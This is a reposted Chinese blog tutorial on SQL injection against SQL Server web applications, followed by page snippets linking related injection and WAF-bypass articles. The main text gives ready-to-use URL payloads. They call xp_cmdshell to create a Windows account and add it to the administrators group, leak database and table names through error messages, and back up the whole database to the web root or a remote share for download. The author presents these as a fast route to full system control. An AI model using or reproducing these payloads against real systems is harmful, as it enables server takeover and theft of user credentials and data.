绕过程序限制和利用系统表注入SQL Server

最新推荐文章于 2024-04-29 23:47:34 发布
最新推荐文章于 2024-04-29 23:47:34 发布
阅读量95 收藏
点赞数
文章标签: 数据库 操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_19796/article/details/82580748
版权
 

   第一节、利用系统注入SQLServer数据库
  SQLServer是一个功能强大的数据库 系统,与操作 系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为 注入者提供了一个跳板,我们先来看看几个具体的例子:
  
  ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
  
  分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用 系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:
  
  ② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
  
  将新建的帐号name加入管理员组,不用两分钟,你已经拿到了 系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。
  
  ③ http://Site/url.asp?id=1 ;;and db_name()>0
  
  前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个 系统变量,返回的是连接的数据库名。
  
  ④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;--
  
  这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如\\202.96.xx.xx\Share\1.db),但成功率不高。
  
  ⑤ http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
  
  前面说过,sysobjects是SQLServer的 系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。
  
…………………………………………………………………………

来自:http://www.verydemo.com/demo_c155_i16994.html

iteye_19796
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入绕过 单引号 限制继续注入
01-02
– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //...
Sql server注入注入绕过
qq_42990434的博客
12-17 3448
本章目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D盾 绕过特性 前言 我们经常利用一些数据库特性来进行WAF绕过。 在MSSQL中,比如可以这样: 浮点数形式:id=1.1union select 科学计数法形式:id=1e0union select 但其实还可以这样子:id=1.eunion select 通过1.e这样的形式,可以用它绕过D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下M
渗透测试之MSSQL简单绕过注入(declare函数)
LKmnbZ's Blog
11-08 1487
引进一个declare 函数,他是mssql声明局部变量的函数,我们经常用它来绕过waf对一些关键词的拦截 select * from admin where id =1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a) -- http://192.168.20.155/test.aspx?i...
利用系统注入SQLServer数据库
asli33的专栏
02-17 391
SQL Server是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:    ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--   分号;在SQLServer
很全的SQL注入语句,有SQL漏洞的都可以拿下
weixin_34306446的博客
12-28 208
1、返回的是连接的数据库名 and db_name()>0 2、作用是获取连接用户名 and user>0 3、将数据库备份到Web目录下面 ;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';-- 4、显示SQL系统版本 and 1=(select @@VERSION) 或and 1=convert(int,@@ver...
多列复合索引的使用 绕过微软sql server的一个缺陷
01-19
然而,微软sql server在处理这类索引时,有个重要的缺陷,那就是把本该编译成索引seek的操作编成了索引扫描,这可能导致严重性能下降 举个例子来说明问题,假设某个T有索引 ( cityid, sentdate, userid), 现在有个...
iis网站服务器+sqlserver数据库服务器安全
02-01
server数据库服务器安全1友好的错误提示页,不出错误黄页,会暴露信息2输入参数检测,get,post,cookie验证,防注入3页面层不含任何业务逻辑4fck等编辑器有安全漏洞,慎用5.net开发除了在页面层对所有输入要防注入外...
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
SQL注入的典型用法是从数据库泄漏机密信息,绕过身份验证逻辑或向数据库中添加未经授权的帐户。 此安全性可防止未经授权访问您的数据库,还可以防止没有适当权限的用户更改或删除您的数据。 恶意文本检测器,约束...
关于SqlServer入参带分号查询问题
qq_15267865的博客
04-06 735
SqlServer入参带分号、或者其他关键字|
绕过杀软!SQL Server Transact-SQL 的无文件攻击姿势
qq_37341685的博客
08-04 718
背景概述 近日,深信服安全团队捕获到一起绕过杀毒软件的无文件攻击事件,被入侵的主机或服务器会被安装Mykings、Mirai、暗云等多种僵尸网络木马及挖矿程序,并且难以彻底清除。经分析排查,该木马通过弱口令爆破SQL Server服务器后,利用sqlserver Transact-SQL存储C#编译恶意代码,通过MSSQL作业定时执行存储过程,在受害主机下载恶意程序。 排查过程 排查主机上的恶意文件、启动项等,发现执行恶意脚本的WMI,功能是下载文件到本地执行: 排查注册启动项,存在一个BGClient
SQL注入之堆叠及WAF绕过注入
av11566的博客
04-21 4440
前言 在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF的绕过,而绕过WAF前肯定需要对WAF的工作原理有一定的理解。 所需知识 1. 堆叠查询注入 定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实 的运用中也是这样的,我们知道在mysql中,主要是命令行中,每
【课堂练习】
最新发布
JacksonLeo的博客
04-29 286
虽然现代JVM的垃圾回收机制已经非常高效,但是在性能敏感的场合,仍然需要注意对象的创建频率。例如,在SysLogininforMapper中的deleteLogininforByIds方法,如果处理大量ID时,应考虑使用批处理技术,而不是循环单条处理。例如,在SysMenuMapper中的查询方法,如果涉及到复杂的查询条件或者大量数据的查询,应确保SQL语句的优化和索引的使用。异常处理:代码中应该有更明确的异常处理逻辑,比如使用try-catch块捕获可能的异常,并进行适当的处理,如记录日志、回滚事务等。
【ROMA解决方案和功能架构】
数据也是生产力,保持热爱,奔赴山海!
04-23 764
1、基于ROMA融合集成平台,实现企业应用、数据、API 、OT设备、云服务、合作伙伴应用之间的集成连接。2、ROMA主要包含四个组件:数据集成(Fast Data Integration,简称FDI)、服务集成(API Connect,简称APIC)、消息集成(Message Queue Service,简称MQS)、设备集成(LINK)。
探秘MySQL主从复制的多种实现方式
todoitbo的博客
04-26 1033
本文将深入探讨MySQL主从复制的多种实现方式,包括基于语句、基于行和混合模式等。无论您是初学者还是有经验的数据库管理员,都能通过本文全面了解MySQL主从复制技术的多样化选择,从而提高数据库的可用性和性能。
mysql-connector-java和spring-boot-starter-jdbc和mybatis-spring-boot-start
xzy的博客
04-23 1019
JDBC是使用java语言操作mysql数据库的规范,java语言必须按照这个规范写才可以操作mysql数据库
SpringCloudAlibaba:2.1nacos
m0_63040701的博客
04-26 916
Nacos是阿里巴巴开源的服务注册中心以及配置中心Nacos=注册中心Eureka + 服务配置Config + 服务总线Bus。
SpringBoot JPA使用
gochenguowei的博客
04-25 984
是 Spring 框架提供的一个模块,用于简化与关系型数据库的交互和数据访问。它基于JPA(Java Persistence API)标准,并提供了一组易于使用的API和工具,帮助开发人员更轻松地进行数据库操作。通过Spring Data JPA,开发人员可以通过编写简洁的代码来执行常见的 CRUD 操作,同时还支持高级查询、分页、事务管理等功能。它的目标是提供一种更简单、更高效的方式来处理数据库操作,减少开发人员的工作量,并提高应用程序的可维护性和可扩展性。
superset部署与实践
m0_60125201的博客
04-29 633
本博客简要介绍了superset这个BI工具,使用两种方法来部署superset,并简单介绍了superset的使用。
利用vs和SQLserver制作学生选课系统
06-08
学生选课系统的制作需要使用到Visual Studio和SQL Server两个软件来完成。以下是简要步骤: 1. 在Visual Studio中创建一个Windows Forms应用程序项目。 2. 在项目中添加一个数据库,将其连接到SQL Server上。 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值